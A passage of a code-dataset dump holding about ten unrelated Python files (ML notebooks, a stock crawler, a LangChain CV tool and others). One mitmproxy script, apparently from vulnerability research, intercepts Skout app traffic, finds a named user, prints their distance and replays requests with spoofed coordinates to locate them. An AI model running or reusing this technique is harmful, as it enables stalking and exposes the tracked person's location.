(os.path.join(_HERE,\"static\"),)\n\n\n\n@hug.get(\"/hello/{who}/\",output=hug.output_format.html,examples=\"martin?age=48\")\n@hug.cli()\ndef index():\n return templates.get_template(\"index.html\").render(**locals())\ndef hello(age : int ,who) :\n \"\"\" Ein Gruss \"\"\"\n age=age+2\n liste=[\n { \"name\": \"Eins\"},\n { \"name\": \"Zwei \"}\n ]\n return templates.get_template(\"compare.html\").render(**locals())\n\n\nif __name__==\"__main__\" :\n hello.interface.cli()\n\n\n\"\"\"\ngit init .\ngit remote add origin username@189.14.666.666:/home/ubuntu/workspace/project.git\ngit add .\ngit commit -m \"Initial commit\n\"\"\"","repo_name":"alex-gaus/nex-server","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":875,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"37741172084","text":"# %% Imports\nimport pandas as pd\nimport numpy as np\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import LabelEncoder\nimport matplotlib.pyplot as plt\n\nimport tensorflow as tf\nfrom tensorflow.keras import Sequential\nfrom tensorflow.keras.layers import Dense\n\nfrom geneticalgorithm import geneticalgorithm as ga\n\n#%% General\ndatasetURL = './data/data.csv'\nepochs = 8\n#%% load the dataset\ndf = pd.read_csv(datasetURL)\ndf = df.astype({'X': np.int8, 'Y': np.int8, 'Green': np.float64, 'Red': np.float64, 'NIR': np.float64, 'Red_edge': np.float64, 'crop': np.int8 })\n\n# %%\ndf.head()\n\n# %%\ndf.describe()\n\n# %%\ndf.crop.value_counts().plot.barh(color=\"red\")\n\n# %% Un Random a todo el dataset\ndf = df.sample(df.shape[0])\ndf.head()\n# %% \ndf.pop('X')\ndf.pop('Y')\ndf.pop('Red')\nfigure = plt.figure(figsize=(19, 15))\nplt.matshow(df.corr(), fignum=figure.number)\nplt.xticks(range(df.select_dtypes(['number']).shape[1]), df.select_dtypes(['number']).columns, fontsize=14, rotation=45)\nplt.yticks(range(df.select_dtypes(['number']).shape[1]), df.select_dtypes(['number']).columns, fontsize=14)\ncb = plt.colorbar()\ncb.ax.tick_params(labelsize=14)\nplt.title('Matrix de correlación del Dataset', fontsize=16);\n\n# %% vamos a balancear el dataset, subset de CROP = 0\n# subset de CROP = 0\ndf0 = df[df.crop == 0]\ndf0.describe()\n# %% subset de CROP = 1\ntempDf1 = df[df.crop == 1]\ndf1 = tempDf1.sample(df0.shape[0])\ndf1.describe()\n\n# balanced = df\n# %% ahora se combinan los dataset\nbalanced = pd.concat([df1, df0])\nbalanced = balanced.sample(balanced.shape[0])\n\n# %% ahora grafiquemos para verificar\nbalanced.crop.value_counts().plot.barh(color=\"red\")\n\n# %% un describe\nbalanced.describe()\n\n# %% un head\nbalanced.head()\n# %% \nfigure = plt.figure(figsize=(19, 15))\nplt.matshow(balanced.corr(), fignum=figure.number)\nplt.xticks(range(balanced.select_dtypes(['number']).shape[1]), balanced.select_dtypes(['number']).columns, fontsize=14, rotation=45)\nplt.yticks(range(balanced.select_dtypes(['number']).shape[1]), balanced.select_dtypes(['number']).columns, fontsize=14)\ncb = plt.colorbar()\ncb.ax.tick_params(labelsize=14)\nplt.title('Matrix de correlación de dataset balanceado', fontsize=16);\n\n# %% ahora preparemos la red neuronal\noutputs = balanced.pop('crop')\ninputs = balanced\n\n# %%\ninputs.head()\n\n# %%\noutputs.head()\n\n# %% Extrae los dataset de entrenamiento y pruebas\ninputTrain, inputTest, outputTrain, outputTest = train_test_split(inputs, outputs, test_size=0.30)\nfeaturesCount = inputTrain.shape[1]\n\n# %% ahora configuremos la red neuronal\n# define model\nmodel = Sequential()\nmodel.add(Dense(featuresCount, activation='relu', kernel_initializer='he_normal', input_shape=(featuresCount,)))\nmodel.add(Dense(3, activation='sigmoid', kernel_initializer='he_normal'))\n# model.add(Dense(3, activation='sigmoid', kernel_initializer='he_normal'))\n# model.add(Dense(3, activation='sigmoid', kernel_initializer='he_normal'))\nmodel.add(Dense(1 , activation='relu'))\n\n# %% \nmodel.summary()\n\n# %%\nmodel.compile(\n # optimizer=tf.keras.optimizers.RMSprop(), \n optimizer='adam', \n loss=tf.keras.losses.BinaryCrossentropy(from_logits=True),\n metrics=['accuracy']\n)\n# %% \nmy_callbacks = [\n tf.keras.callbacks.EarlyStopping(patience=2),\n tf.keras.callbacks.ModelCheckpoint(filepath='./logscheckpoint', monitor='val_loss', verbose=1, save_best_only=False, mode='auto'),\n tf.keras.callbacks.TensorBoard(log_dir='./logs'),\n]\n# %%\nhistory = model.fit(inputTrain, outputTrain, epochs=epochs, batch_size=128)\n\n# %%\nloss, acc = model.evaluate(inputTest, outputTest, verbose=1)\nprint('loss: ', loss)\nprint('acc: ', acc)\n\n\nprint('history: ', history.history)\nprint('history: ', history.history.keys())\n\nepochsSerie = range(1, len(history.history['accuracy']) + 1, 1)\n\nplt.title ('Curvas de entrenamiento')\n\nplt.plot(epochsSerie, history.history['accuracy'], 'r--', label='Training acc')\nplt.plot(epochsSerie, history.history['loss'], 'b--', label='Training loss')\n\nplt.ylabel('Porcentaje')\nplt.xlabel('Epochs')\n\nplt.legend()\nplt.figure()","repo_name":"javierrojas6/rice-crop-detection","sub_path":"code/python/rn/cultivos.py","file_name":"cultivos.py","file_ext":"py","file_size_in_byte":4043,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"5953383029","text":"from typing import Optional\n\nfrom bisheng.template.field.base import TemplateField\nfrom bisheng.template.frontend_node.base import FrontendNode\nfrom bisheng.template.template.base import Template\n\n\nclass InputOutputNode(FrontendNode):\n name: str = 'InputOutputNode'\n base_classes: list[str] = ['input', 'output']\n\n def add_extra_fields(self) -> None:\n pass\n\n @staticmethod\n def format_field(field: TemplateField, name: Optional[str] = None) -> None:\n FrontendNode.format_field(field, name)\n if name == 'Report':\n if field.name == 'memory':\n field.show = False\n elif field.name == 'input_node':\n field.show = False\n elif field.name == 'chains':\n field.show = True\n field.field_type = 'function'\n field.display_name = 'functions'\n elif field.name == 'report_name':\n field.show = True\n field.display_name = 'Report Name'\n field.info = 'the file name we generate'\n elif field.name == 'variables':\n field.show = True\n field.field_type = 'VariableNode'\n if name == 'VariableNode':\n if field.name == 'variables':\n field.show = True\n field.field_type = 'variable'\n field.required = True\n\n\nclass InputNode(FrontendNode):\n name: str = 'InputNode'\n template: Template = Template(\n type_name='input',\n fields=[\n TemplateField(\n field_type='str',\n is_list=True,\n multiline=True,\n required=True,\n show=True,\n name='input',\n display_name='输入内容',\n ),\n ],\n )\n description: str = \"\"\"输入节点,用来自动对接输入\"\"\"\n base_classes: list[str] = ['input']\n\n def to_dict(self):\n return super().to_dict()\n\n\nclass InputFileNode(FrontendNode):\n name: str = 'InputFileNode'\n template: Template = Template(\n type_name='InputFileNode',\n fields=[\n TemplateField(\n field_type='file',\n show=True,\n name='file_path',\n value='',\n ),\n TemplateField(\n field_type='str',\n show=True,\n name='file_type',\n placeholder='提示上传文件类型',\n display_name='Name',\n info='Tips for which file should upload'\n ),\n ],\n )\n description: str = \"\"\"输入节点,用来自动对接输入\"\"\"\n base_classes: list[str] = ['fileNode']\n\n @staticmethod\n def format_field(field: TemplateField, name: Optional[str] = None) -> None:\n FrontendNode.format_field(field, name)\n field.show = True\n\n def to_dict(self):\n return super().to_dict()\n\n\nclass OutputNode(FrontendNode):\n name: str = 'OutputNode'\n template: Template = Template(\n type_name='output',\n fields=[\n TemplateField(\n field_type='str',\n list=False,\n multiline=True,\n required=True,\n show=True,\n name='output',\n display_name='展示输出内容',\n ),\n ],\n )\n description: str = \"\"\"输出节点,用来表示输出\"\"\"\n base_classes: list[str] = ['output']\n\n def to_dict(self):\n return super().to_dict()\n","repo_name":"dataelement/bisheng","sub_path":"src/backend/bisheng/template/frontend_node/input_output.py","file_name":"input_output.py","file_ext":"py","file_size_in_byte":3539,"program_lang":"python","lang":"en","doc_type":"code","stars":2577,"dataset":"github-code","pt":"54"} +{"seq_id":"23345868480","text":"import pyftdi.serialext\nfrom pyftdi.ftdi import Ftdi\n\n#replace ftdi with what your port.py says\nser = pyftdi.serialext.serial_for_url(\"ftdi://ftdi:232:A50285BI/1\")\nser.baudrate = 115200\nser.write_timeout = 0.1\n\n\nwhile True:\n try:\n data = ser.read(1)\n #print(data)\n if data != ' ':\n print(\"It works!\")\n except KeyboardInterrupt:\n break\n\nser.close()\n\n","repo_name":"peteblank/waifu-conversation","sub_path":"extra/recieving.py","file_name":"recieving.py","file_ext":"py","file_size_in_byte":412,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"71085698082","text":"import numpy as np\nimport math\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\n\nsavedir = \"../slides/images/\"\n\nmaxl = 4\n\ndef gridpoints(lx, ly):\n start = 0\n end = 2**maxl\n\n gx = [2**(maxl - lx) * i for i in range(1, 2**lx) if i % 2 == 1]\n gy = [2**(maxl - ly) * i for i in range(1, 2**ly) if i % 2 == 1]\n\n g = [(x, y) for x in gx for y in gy]\n\n return list(zip(*g))\n\ndef drawAll2():\n f, ax = plt.subplots(1, 1)\n for i in range(1, maxl+1):\n for j in range(1, maxl+1):\n pts = gridpoints(i, j)\n if (i + j) < 2 + maxl:\n ax.plot(pts[0], pts[1], \"ob\", ms=7)\n ax.axis([0, 2**maxl, 0, 2**maxl])\n ax.set_xticklabels([])\n ax.set_yticklabels([])\n plt.savefig(savedir + \"sparsegrid_d4.png\", bbox_inches=\"tight\")\n plt.show()\n\ndrawAll2()\n","repo_name":"elfeck/caml","sub_path":"src/sparse_dots_dim.py","file_name":"sparse_dots_dim.py","file_ext":"py","file_size_in_byte":855,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"16924725570","text":"from sklearn import tree\nfrom sklearn.metrics import mean_squared_error, r2_score\nimport numpy as np\nimport math\nfrom sklearn import metrics\nimport BaseFunc\nmon_inEng={'Jan','Feb'}\nif __name__ == '__main__':\n \n obs_img_path=r'F:\\TestDemo1\\obs_pr__1967_2.tif'\n true_pixel_index = BaseFunc.GetTPixelIndex(obs_img_path)\n \n R_accuracy_list=list(range(12))\n R2_accuracy_list=list(range(12))\n std_accuracy_list=list(range(12))\n CRMSE_accuracy_list=list(range(12))\n MAE_accuracy_list=list(range(12))\n\n for mon in mon_inEng:\n print(\"month----\"+str(mon))\n mon_num=BaseFunc.GetMonthNum(mon)\n month_path_train=r'F:\\5_TrainingDataSet\\pr'+\"\\\\\"+mon+\"\\\\TrainNet\"\n year_folders_list_train=BaseFunc.GetSubfoldOfMonth(month_path_train)\n month_path_test=r'F:\\5_TrainingDataSet\\pr'+\"\\\\\"+mon+\"\\\\TestNet\"\n year_folders_list_test=BaseFunc.GetSubfoldOfMonth(month_path_test)\n \n \n x_train=[] ; y_train=[]#存储训练集或测试集中XY值\n BaseFunc.GetXYDataset(year_folders_list_train,x_train,y_train,true_pixel_index)\n x_test=[] ; y_test=[]#存储训练集或测试集中XY值\n BaseFunc.GetXYDataset(year_folders_list_test,x_test,y_test,true_pixel_index)\n \n #构建训练模型\n clf = tree.DecisionTreeRegressor()\n clf.fit(x_train, y_train)\n \n \n # Plot outputs\n y_pre_test = clf.predict(x_test)\n \n #输出训练后模型y值和真实值y之间误差\n #输出相关性\n R=np.corrcoef(np.array(y_test), np.array(y_pre_test))[0][1]#np自带函数计算\n R_accuracy_list[mon_num-1]=R\n # #输出R2拟合度\n # R2=r2_score(y_test, y_pre_test)\n # R2_accuracy_list[mon_num-1]=R2\n # #计算std方差\n # std_accuracy=math.sqrt(np.var(np.array(y_pre_test)));print(std_accuracy)\n # std_accuracy_list[mon_num-1]=std_accuracy\n # #计算中心化均方根误差\n # # y_test[:]=y_test[:]-sum(y_test)/len(y_test);y_pre_test[:]=y_pre_test[:]-sum(y_pre_test)/len(y_pre_test)\n rmes=mean_squared_error(y_test, y_pre_test,squared=False)\n # # CRMSE_accuracy_list[mon_num-1]=rmes\n # #计算MAE\n MAE=metrics.mean_absolute_error(y_pre_test, y_test)\n MAE_accuracy_list[mon_num-1]=MAE\n for MAE in R_accuracy_list:\n print(MAE)\n \n\n \n\n\n","repo_name":"ParinZhang/HESS245","sub_path":"2_DecisionTree.py","file_name":"2_DecisionTree.py","file_ext":"py","file_size_in_byte":2393,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"27462932377","text":"\"\"\"Top-level package for eyecandies.\"\"\"\n\n__author__ = \"Eyecan.ai\"\n__email__ = \"info@eyecan.ai\"\n__version__ = \"1.0.3\"\n\n\ndef main():\n from pipelime.cli import PipelimeApp\n\n app = PipelimeApp(\n \"eyecandies.commands\", \"eyecandies.stages\", app_version=__version__\n )\n app()\n","repo_name":"eyecan-ai/eyecandies","sub_path":"eyecandies/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":288,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"54"} +{"seq_id":"74489950882","text":"import pickle\nimport requests\nfrom datetime import date\nfrom io import StringIO\nimport pandas as pd\nimport json\ndef transform_date(date): \n y, m, d = date.split('/')\n return str(int(y)+1911) + '/' + m + '/' + d\n\nhigh = pd.read_pickle(\"/home/pineapple/Documents/stock/crawler/history/最高價.pkl\")\nlow = pd.read_pickle(\"/home/pineapple/Documents/stock/crawler/history/最低價.pkl\")\nstart = pd.read_pickle(\"/home/pineapple/Documents/stock/crawler/history/開盤價.pkl\")\nend = pd.read_pickle(\"/home/pineapple/Documents/stock/crawler/history/收盤價.pkl\")\nvolumn = pd.read_pickle(\"/home/pineapple/Documents/stock/crawler/history/成交股數.pkl\")\ncount = pd.read_pickle(\"/home/pineapple/Documents/stock/crawler/history/成交筆數.pkl\")\n\ntoday = date.today()\ndf_time=pd.Timestamp(today)\nday = today.strftime(\"%Y/%m/%d\")\ndatestr = today.strftime(\"%Y%m%d\")\n#if start.index[-1] < df_time:\nstartPrice={}\nhighPrice={}\nlowPrice={}\nendPrice={}\nvolumnPart={}\ncountPart={}\n#datestr = '20230220'\n#day = '2023/02/20'\n#df_time=pd.Timestamp(day)\n#上市\nr = requests.post('https://www.twse.com.tw/exchangeReport/MI_INDEX?response=csv&date=' + datestr + '&type=ALL')\nif datestr in r.headers[\"Content-disposition\"] and len(r.text)>0:\n print('it is today data')\n df = pd.read_csv(StringIO(r.text.replace(\"=\", \"\")), header=[\"證券代號\" in l for l in r.text.split(\"\\n\")].index(True)-1, index_col=['證券代號'])\n df=df[df.index.str.len() <5]\n #display(df) \n for i in df.index:\n try:\n startPrice[i] = float(df['開盤價'][i].replace(',',''))\n highPrice[i] = float(df['最高價'][i].replace(',',''))\n lowPrice[i] = float(df['最低價'][i].replace(',',''))\n endPrice[i] = float(df['收盤價'][i].replace(',',''))\n volumnPart[i] = float(df['成交股數'][i].replace(',',''))\n countPart[i] = float(df['成交筆數'][i].replace(',',''))\n except:\n print('error 1:', i)\n continue\n#上櫃\nr2 = requests.post('https://www.tpex.org.tw/web/stock/aftertrading/daily_close_quotes/stk_quote_result.php')\njson_data = json.loads(r2.text)\nstock_json = json_data[\"aaData\"]\n#print(stock_json)\nif transform_date(json_data['reportDate']) == day and len(r.text)>0:\n print('it is today data 2')\n df2 = pd.DataFrame(stock_json)\n df2 = df2.set_index([0])\n df2=df2[df2.index.str.len() <5]\n for j in df2.index:\n try:\n startPrice[j] = float(df2.loc[j][4].replace(',',''))\n highPrice[j] = float(df2.loc[j][5].replace(',',''))\n lowPrice[j] = float(df2.loc[j][6].replace(',',''))\n endPrice[j] = float(df2.loc[j][2].replace(',',''))\n volumnPart[j] = float(df2.loc[j][8].replace(',',''))\n countPart[j] = float(df2.loc[j][10].replace(',',''))\n except:\n print('error 2:', j)\n continue\n \n start_new = pd.DataFrame([startPrice], index = [df_time])\n start_merge = pd.concat([start,start_new])\n start_merge.index.name = 'date'\n start_merge.columns.name= 'stock_id'\n start_merge = start_merge[~start_merge.index.duplicated(keep='last')]\n start_merge.to_pickle(\"/home/pineapple/Documents/stock/crawler/history/開盤價.pkl\")\n\n high_new = pd.DataFrame([highPrice], index = [df_time])\n high_merge = pd.concat([high,high_new])\n high_merge.index.name = 'date'\n high_merge.columns.name= 'stock_id'\n high_merge = high_merge[~high_merge.index.duplicated(keep='last')]\n high_merge.to_pickle(\"/home/pineapple/Documents/stock/crawler/history/最高價.pkl\")\n\n low_new = pd.DataFrame([lowPrice], index = [df_time])\n low_merge = pd.concat([low,low_new])\n low_merge.index.name = 'date'\n low_merge.columns.name= 'stock_id'\n low_merge = low_merge[~low_merge.index.duplicated(keep='last')]\n low_merge.to_pickle(\"/home/pineapple/Documents/stock/crawler/history/最低價.pkl\")\n\n end_new = pd.DataFrame([endPrice], index = [df_time])\n end_merge = pd.concat([end,end_new])\n end_merge.index.name = 'date'\n end_merge.columns.name= 'stock_id'\n end_merge = end_merge[~end_merge.index.duplicated(keep='last')]\n end_merge.to_pickle(\"/home/pineapple/Documents/stock/crawler/history/收盤價.pkl\")\n\n volumn_new = pd.DataFrame([volumnPart], index = [df_time])\n volumn_merge = pd.concat([volumn,volumn_new])\n volumn_merge.index.name = 'date'\n volumn_merge.columns.name= 'stock_id'\n volumn_merge = volumn_merge[~volumn_merge.index.duplicated(keep='last')]\n volumn_merge.to_pickle(\"/home/pineapple/Documents/stock/crawler/history/成交股數.pkl\")\n\n count_new = pd.DataFrame([countPart], index = [df_time])\n count_merge = pd.concat([count,count_new])\n count_merge.index.name = 'date'\n count_merge.columns.name= 'stock_id'\n count_merge = count_merge[~count_merge.index.duplicated(keep='last')]\n count_merge.to_pickle(\"/home/pineapple/Documents/stock/crawler/history/成交筆數.pkl\")","repo_name":"itony215/stock_real_time","sub_path":"update_price.py","file_name":"update_price.py","file_ext":"py","file_size_in_byte":4981,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"35118096658","text":"import pandas as pd\ncsvData = pd.read_csv('./../0.0 - data/data.csv')\n# header = X\n# header = None, names = ['time', 'space', 'range']\n# index_col = X\n# index_col = False\nseries_data = pd.DataFrame() # or something like that\n\nseries_data.to_csv('export_file.csv')\n\nseries_data.to_csv('exported_file.csv', header=False, index=False)\n\n# mode=a for appending an existing file","repo_name":"cgmoganedi/PythonBasics","sub_path":"a_Python3.6Essentials/1.4 - data analysis with pandas/pandas-0.4.py","file_name":"pandas-0.4.py","file_ext":"py","file_size_in_byte":372,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"72355804642","text":"import sys\nfrom pathlib import Path\nfrom typing import List, Union\nfrom langchain.docstore.document import Document\nfrom langchain.document_loaders import PDFPlumberLoader, Docx2txtLoader\nfrom langchain.chat_models import ChatOpenAI\nfrom langchain.vectorstores import Chroma\nfrom langchain.text_splitter import CharacterTextSplitter\nfrom langchain.embeddings.openai import OpenAIEmbeddings\nfrom langchain.chains import RetrievalQA\nfrom dataclasses import dataclass\nimport pickle\n\nfrom dotenv import load_dotenv\n\nload_dotenv()\n\nclass Config(): \n model = 'gpt-3.5-turbo-16k'\n # model = 'gpt-4'\n llm = ChatOpenAI(model=model, temperature=0)\n embeddings = OpenAIEmbeddings()\n chunk_size = 2000\n chroma_persist_directory = 'chroma_store'\n candidate_infos_cache = Path('candidate_infos_cache')\n if not candidate_infos_cache.exists():\n candidate_infos_cache.mkdir()\n\ncfg = Config()\n\nquestions = [\n \"What is the name of the job candidate?\",\n \"What are the specialities of this candidate?\",\n \"Please extract all hyperlinks.\",\n \"How many years of experience does this candidate have as a mobile developer?\",\n \"Which universities are mentioned in the CV?\"\n]\n\n@dataclass\nclass CandidateInfo():\n \"\"\"\n Contains the name of the candidate and the question / answer list.\n \"\"\"\n candidate_file: str\n questions: list[(str, str)]\n\n\ndef process_document(doc_path) -> Chroma:\n \"\"\"\n Processes the document by loading the text from the document. \n There are two supported formats: pdf and docx. Then it splits \n the text in large chunks from which then embeddings are extracted.\n :param doc_path a path with documents or a string representing that path.\n :return a Chroma wrapper around the embeddings.\n \"\"\"\n if not isinstance(doc_path, Path):\n doc_path = Path(doc_path)\n if not doc_path.exists():\n print(f\"The document ({doc_path}) does not exist. Please check\")\n else:\n print(f\"Processing {doc_path}\")\n loader = (PDFPlumberLoader(str(doc_path)) if doc_path.suffix == \".pdf\"\n else Docx2txtLoader(str(doc_path)))\n doc_list: List[Document] = loader.load()\n print(f\"Extracted documents: {len(doc_list)}\")\n for i, doc in enumerate(doc_list):\n i += 1\n if len(doc.page_content) == 0:\n print(f\"Document has empty page: {i}\")\n else:\n print(f\"Page {i} length: {len(doc.page_content)}\")\n text_splitter = CharacterTextSplitter(chunk_size=cfg.chunk_size, chunk_overlap=0)\n texts = text_splitter.split_documents(doc_list)\n\n return extract_embeddings(texts, doc_path)\n \n\ndef extract_embeddings(texts: List[Document], doc_path: Path) -> Chroma:\n \"\"\"\n Either saves the Chroma embeddings locally or reads them from disk, in case they exist.\n :return a Chroma wrapper around the embeddings.\n \"\"\"\n embedding_dir = f\"{cfg.chroma_persist_directory}/{doc_path.stem}\"\n if Path(embedding_dir).exists():\n return Chroma(persist_directory=embedding_dir, embedding_function=cfg.embeddings)\n try:\n docsearch = Chroma.from_documents(texts, cfg.embeddings, persist_directory=embedding_dir)\n docsearch.persist()\n except Exception as e:\n print(f\"Failed to process {doc_path}: {str(e)}\")\n return None\n return docsearch\n\n\ndef read_saved_candidate_infos(file_key: str) -> Union[None, CandidateInfo]:\n \"\"\"\n Reads a pickle file with the questions and answers about a candidate.\n :param file_key The key - file name used to retrieve the pickle file.\n :return either nothing or a set of questions and answers.\n \"\"\"\n cached_file = cfg.candidate_infos_cache/file_key\n try:\n if cached_file.exists():\n with open(cached_file, \"rb\") as f:\n return pickle.load(f)\n except Exception as e:\n print(f\"Could not process {file_key}\")\n return None\n\n\ndef write_candidate_infos(file_key, candidate_info):\n \"\"\"\n Writes a pickle file with the questions and answers about a candidate.\n :param file_key The key - file name used to retrieve the pickle file.\n :candidate_info The information about a candidate which will be pickled.\n \"\"\"\n cached_file = cfg.candidate_infos_cache/file_key\n with open(cached_file, \"wb\") as f:\n pickle.dump(candidate_info, f)\n\n\ndef extract_candidate_infos(doc_folder: Path) -> List[CandidateInfo]:\n \"\"\"\n Extracts the questions and answers from each pdf or docx file in `doc_folder` \n and saves these in a list. First it loops through the files, extracts their content\n as embeddings and caches these and then interacts with ChatGPT. The answers are then \n saves in a data structure and cached. If the naswers are alwready available for a candidate\n they are read from a pickled file.\n :param doc_folder The folder with the candidate documents.\n :return the list with candidate question' and answers.\n \"\"\"\n if not doc_folder.exists():\n print(f\"Candidate folder {doc_folder} does not exist!\")\n return []\n candidate_list: list[CandidateInfo] = []\n extensions: list[str] = ['**/*.pdf', '**/*.docx']\n for extension in extensions:\n for doc in doc_folder.rglob(extension):\n file_key = doc.stem\n cached_candidate_info = read_saved_candidate_infos(file_key)\n if cached_candidate_info is None:\n docsearch = process_document(doc)\n print(f\"Processed {doc}\")\n if docsearch is not None:\n qa = RetrievalQA.from_chain_type(llm=cfg.llm, chain_type=\"stuff\", retriever=docsearch.as_retriever())\n question_list = []\n for question in questions:\n question_list.append((question, qa.run(question)))\n candidate_info = CandidateInfo(candidate_file=file_key, questions=question_list)\n write_candidate_infos(file_key, candidate_info)\n candidate_list.append(candidate_info)\n else:\n print(f\"Could not retrieve content from {doc}\")\n else:\n candidate_list.append(cached_candidate_info)\n return candidate_list\n\n\ndef render_candidate_infos(candidate_infos: list[CandidateInfo]) -> str:\n \"\"\"\n Receives a list of candidate question and answers and converts them to HTML.\n :param candidate_infos The list of candidate question and answers\n :return an HTML string.\n \"\"\"\n html = \"\"\n for candidate_info in candidate_infos:\n qa_html = \"\"\n for question, answer in candidate_info.questions:\n qa_html += f\"\"\"\n
{question}
\n

{answer}

\n\"\"\"\n html += f\"\"\"\n
\n
\n {candidate_info.candidate_file}\n
\n
\n {qa_html}\n
\n
\n\"\"\"\n return html","repo_name":"gilfernandes/document_stuff_playground","sub_path":"document_extract.py","file_name":"document_extract.py","file_ext":"py","file_size_in_byte":7048,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"11271642020","text":"#from libmproxy.protocol.http import decoded\nimport json\nfrom mitmproxy import ctx\n\ndef response(flow):\n #code to handle request flows\n if flow.request.pretty_url.endswith(\"getBroadcastsByNearbySort\"): \n flowDict = {}\n flowDict = flow.response.text\n flowDict = json.loads(flowDict)\n print(flowDict['result']['broadcasts'][0])\n try:\n for user in flowDict['result']['broadcasts']:\n if (user['userDetails']['displayName'] == 'Savagesassy99'):\n print(user['objectId'])\n for userDist in flowDict['result']['metadata']['broadcasts']:\n if(userDist['id'] == user['objectId']):\n print(\"Distance in Km: \",userDist['distanceInKm'])\n except:\n print(\"Error\")\n locDict = json.loads(flow.request.text)\n print(locDict)\n locDict['latitude'] = 53.34104757062299\n locDict['longitude'] = -113.52182336047694\n print(locDict)\n flow = flow.copy()\n flow.request.text = json.dumps(locDict)\n ctx.master.commands.call(\"replay.client\", [flow])","repo_name":"muzmu/Vulnerability-Analysis","sub_path":"Skout/find_request.py","file_name":"find_request.py","file_ext":"py","file_size_in_byte":1144,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"30554912463","text":"from curve import curve\nfrom edge import edge\n# 3rd-party\nimport matplotlib.pyplot as plt\n# Standard\nfrom math import pi, sqrt, ceil\nfrom cmath import exp\nfrom time import sleep\n\n\ndef distance(pt1, pt2):\n '''\n pt1 et pt2 : tuples\n\n return distance(pt1, pt2)\n '''\n return sqrt(((pt1[0] - pt2[0]) ** 2 + (pt1[1] - pt2[1]) ** 2).real)\n\n\ndef periode(pts):\n '''\n pts : liste de points (tuples)\n\n return périmètre de la courbe\n '''\n T = 0\n for i in range(len(pts)):\n T += distance(pts[i], pts[i - 1])\n return T\n\n\ndef geogebra(pts, T, N=20, p=0):\n '''\n pts : courbe : liste de points (tuples)\n T : période/périmètre de la courbe pts\n N : nombre de coefficients de fourier / nombre de cercle + 1\n p : module minimal de la partie réele des coefficients / rayon minimal des cercles\n\n print instructions de construction geogebra\n '''\n # Calcul des coefficients\n N //= 2\n coef = [c(k, pts, T) for k in range(-N, N + 1)]\n\n # Période\n print(f'Ne pas oublier t de période {ceil(T)} et show trace')\n\n # Centres des cercles\n print('C0 = 0 + 0ί')\n indexes = [0]\n for k in range(2 * N + 1):\n if abs(coef[k].real) > p:\n print(f'C{k+1} = C{indexes[-1]} + ({coef[k].real:.20f} + {coef[k].imag:.20f}ί) * exp({-(k - N)} / {T:.20f} * 2 * π * t * ί)')\n indexes.append(k + 1)\n\n # Cercles\n for k in range(1, len(indexes)):\n print(f'Circle(C{indexes[k - 1]}, C{indexes[k]})')\n\n\ndef equation(pts, T, N=20, p=0):\n '''\n pts : courbe : liste de points (tuples)\n T : période/périmètre de la courbe pts\n N : nombre de coefficients de fourier / nombre de cercle + 1\n p : module minimal de la partie réele des coefficients / rayon minimal des cercles\n\n print équation de l'épicycloïde\n '''\n N //= 2\n return ' + '.join([f'({c(k, pts, T).real:.20f} + {c(k, pts, T).imag:.20f}ί)' + f' * ℯ^(-ί * {2 * k / T * pi:.20f} * t)' if abs(c(k, pts, T).real) > p else 'a' for k in range(-N, N + 1)]).replace('a + ', '').replace('+ a', '')\n\n\ndef fourier_iter(ts, pts, T, N=20, p=0):\n '''\n ts : liste de valeurs pour t\n pts : courbe : liste de points (tuples)\n T : période/périmètre de la courbe pts\n N : nombre de coefficients de fourier / nombre de cercle + 1\n p : module minimal de la partie réele des coefficients / rayon minimal des cercles\n\n return liste points approximant la courbe\n '''\n N //= 2\n coef = [c(k, pts, T) for k in range(-N, N + 1)]\n return [sum([coef[k + N] * exp(complex(0, 2 * pi * k / T * t)) if abs(coef[k + N].real) > p else 0 for k in range(-N, N + 1)]) for t in ts]\n\n\ndef fourier(t, pts, T, N=20, p=0):\n '''\n t : paramètre de l'épicycloïde\n pts : courbe : liste de points (tuples)\n T : période/périmètre de la courbe pts\n N : nombre de coefficients de fourier / nombre de cercle + 1\n p : module minimal de la partie réele des coefficients / rayon minimal des cercles\n\n return liste points approximant la courbe\n '''\n N //= 2\n return sum(c(k, pts, T) * exp(complex(0, 2 * pi * k / T * t)) if abs(c(k, pts, T).real) > p else 0 for k in range(-N, N + 1))\n\n\ndef c(k, pts, T):\n '''\n k : indice du coefficient de fourier\n pts : courbe : liste de points (tuples)\n T : période/périmètre de la courbe pts\n\n return k-ième coefficient de fourier\n '''\n coefs = 0\n t = 0\n n = 0\n while t < T and n < len(pts):\n try:\n dt = distance(pts[n], pts[n + 1])\n except IndexError:\n dt = distance(pts[0], pts[-1])\n coefs += dt * exp(complex(0, -k * t * 2 * pi / T)) * complex(pts[n][0], pts[n][1])\n n += 1\n t += dt\n return coefs / T\n\n\nif __name__ == '__main__':\n nb_cercles = 50\n rayon_minimal = 0\n path = 'ens.png'\n\n print(\"Détection d'un bord et des coordonnés de la courbe.\")\n pts = curve(edge(path))\n\n print(\"Séparation des x et y.\")\n ptsx = [pt[0] for pt in pts]\n ptsy = [pt[1] for pt in pts]\n\n print(\"Calcul de la période.\")\n T = periode(pts)\n\n print(\"Échantillonage des ts.\")\n p = 1 # précision\n ts = [t / p for t in range(ceil(T * p) + 1)]\n\n print(\"Calcul des affixes des pts de la série de fourier complexe de la courbe.\")\n zs = fourier_iter(ts, pts, T, N=nb_cercles, p=rayon_minimal)\n\n print(\"Séparation des x et 